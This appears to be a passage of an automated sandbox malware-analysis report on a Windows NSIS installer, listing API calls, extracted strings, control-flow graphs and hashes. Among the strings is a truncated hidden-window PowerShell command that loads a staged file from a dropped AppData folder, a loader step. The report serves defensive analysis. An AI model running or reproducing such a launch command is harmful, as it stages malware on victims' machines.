        • CoTaskMemFree.OLE32(?), ref: 004063DD
        • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
        • lstrlenW.KERNEL32(004281E0,00000000,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 0040645B
        Strings
        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
        • powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl, xrefs: 0040642E
        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
        • C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\, xrefs: 00406259
        Similarity
        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
        • String ID: C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl
        • API String ID: 900638850-1834415137
        • Opcode ID: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
        • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
        • Opcode Fuzzy Hash: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
        • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D

        Control-flow Graph (entry block 40176f-401794; graph edge dump not reproduced)
        APIs
        • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning,?,?,00000031), ref: 004017B0
        • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning,?,?,00000031), ref: 004017D5
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        Similarity
        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
        • String ID: %TMP%$C:\Users\user\AppData\Roaming\afdragsordning$loyolism
        • API String ID: 1941528284-686795545
        • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
        • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
        • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
        • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E

        Control-flow Graph (entry block 405371-405386; graph edge dump not reproduced)
        APIs
        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
        • lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
        • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        Similarity
        • API ID: MessageSend$lstrlen$TextWindowlstrcat
        • String ID: C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\
        • API String ID: 2531174081-2186736354
        • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
        • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
        • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
        • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68

        Control-flow Graph (entry block 405840-40588b; graph edge dump not reproduced)
        APIs
        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
        • GetLastError.KERNEL32 ref: 00405897
        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
        • GetLastError.KERNEL32 ref: 004058B6
        Strings
        • C:\Users\user\Desktop, xrefs: 00405840
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: ErrorLast$CreateDirectoryFileSecurity
        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
        • API String ID: 3449924974-1521822154
        • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
        • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
        • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
        • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99

        Control-flow Graph (rendered graph not captured; extracted node and edge list follows)
        control_flow_graph 642 40657c-40659c GetSystemDirectoryW 643 4065a0-4065a2 642->643 644 40659e 642->644 645 4065b3-4065b5 643->645 646 4065a4-4065ad 643->646 644->643 648 4065b6-4065e9 wsprintfW LoadLibraryExW 645->648 646->645 647 4065af-4065b1 646->647 647->648
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
        • wsprintfW.USER32 ref: 004065CE
        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: DirectoryLibraryLoadSystemwsprintf
        • String ID: %s%S.dll$UXTHEME$\
        • API String ID: 2200240437-1946221925
        • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
        • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
        • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
        • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8

        Control-flow Graph (rendered graph not captured; extracted node and edge list follows)
        control_flow_graph 649 405e16-405e22 650 405e23-405e57 GetTickCount GetTempFileNameW 649->650 651 405e66-405e68 650->651 652 405e59-405e5b 650->652 653 405e60-405e63 651->653 652->650 654 405e5d 652->654 654->653
        APIs
        • GetTickCount.KERNEL32 ref: 00405E34
        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
        Strings
        • "C:\Users\user\Desktop\Ej86aa7Ki7.exe", xrefs: 00405E16
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
        • nsa, xrefs: 00405E23
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CountFileNameTempTick
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\$nsa
        • API String ID: 1716503409-1720690683
        • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
        • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
        • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
        • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64

        Control-flow Graph (rendered graph not captured; extracted node and edge list follows)
        control_flow_graph 655 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 662 402436-40243e 655->662 663 402adb-402aea 655->663 665 402440-40244d call 402c53 lstrlenW 662->665 666 402451-402454 662->666 665->666 669 402456-402467 call 402c31 666->669 670 402468-40246b 666->670 669->670 671 40247c-402490 RegSetValueExW 670->671 672 40246d-402477 call 40317b 670->672 677 402492 671->677 678 402495-402573 RegCloseKey 671->678 672->671 677->678 678->663 680 4028a1-4028a8 678->680 680->663
        APIs
        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
        • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
        • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
        • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseCreateValuelstrlen
        • String ID:
        • API String ID: 1356686001-0
        • Opcode ID: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
        • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
        • Opcode Fuzzy Hash: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
        • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68

        Control-flow Graph (rendered graph not captured; extracted node and edge list follows)
        control_flow_graph 681 401ed5-401ee6 call 402c53 call 405371 call 4058f2 687 401eeb-401ef0 681->687 688 4028a1-4028a8 687->688 689 401ef6-401ef9 687->689 690 402adb-402aea 688->690 691 401f4a-401f53 CloseHandle 689->691 692 401efb-401f0b WaitForSingleObject 689->692 691->688 691->690 694 401f1b-401f1d 692->694 696 401f0d-401f19 call 406628 WaitForSingleObject 694->696 697 401f1f-401f2f GetExitCodeProcess 694->697 696->694 698 401f31-401f3c call 406159 697->698 699 401f3e-401f41 697->699 698->691 699->691 702 401f43 699->702 702->691
        APIs
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
          • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
          • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
        • String ID:
        • API String ID: 3585118688-0
        • Opcode ID: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
        • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
        • Opcode Fuzzy Hash: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
        • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A

        Control-flow Graph (rendered graph not captured; extracted node and edge list follows)
        control_flow_graph 705 403969-403978 706 403984-40398c 705->706 707 40397a-40397d CloseHandle 705->707 708 403998-4039a4 call 4039c6 call 405a03 706->708 709 40398e-403991 CloseHandle 706->709 707->706 713 4039a9-4039aa 708->713 709->708
        APIs
        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
        Strings
        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
        • C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\, xrefs: 0040399F
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\
        • API String ID: 2962429428-445889443
        • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
        • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
        • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
        • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
        APIs
          • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405C7F
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
          • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\afdragsordning,?,00000000,000000F0), ref: 0040164D
        Strings
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 00401640
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharNext$Directory$AttributesCreateCurrentFile
        • String ID: C:\Users\user\AppData\Roaming\afdragsordning
        • API String ID: 1892508949-4024115843
        • Opcode ID: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
        • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
        • Opcode Fuzzy Hash: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
        • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
        APIs
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
          • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405C7F
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
        • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405D27
        • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0), ref: 00405D37
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharNext$AttributesFilelstrcpynlstrlen
        • String ID: 0_B
        • API String ID: 3248276644-2128305573
        • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
        • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
        • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
        • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
        APIs
        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
        • CloseHandle.KERNEL32(?), ref: 00405928
        Strings
        • Error launching installer, xrefs: 00405905
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseCreateHandleProcess
        • String ID: Error launching installer
        • API String ID: 3712363035-66219284
        • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
        • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
        • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
        • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
        • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
        • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
        • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
        • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
        • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
        • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
        • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
        • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
        • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
        • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
        • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
        • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
        • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
        • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
        • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
        • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
        • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
        • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
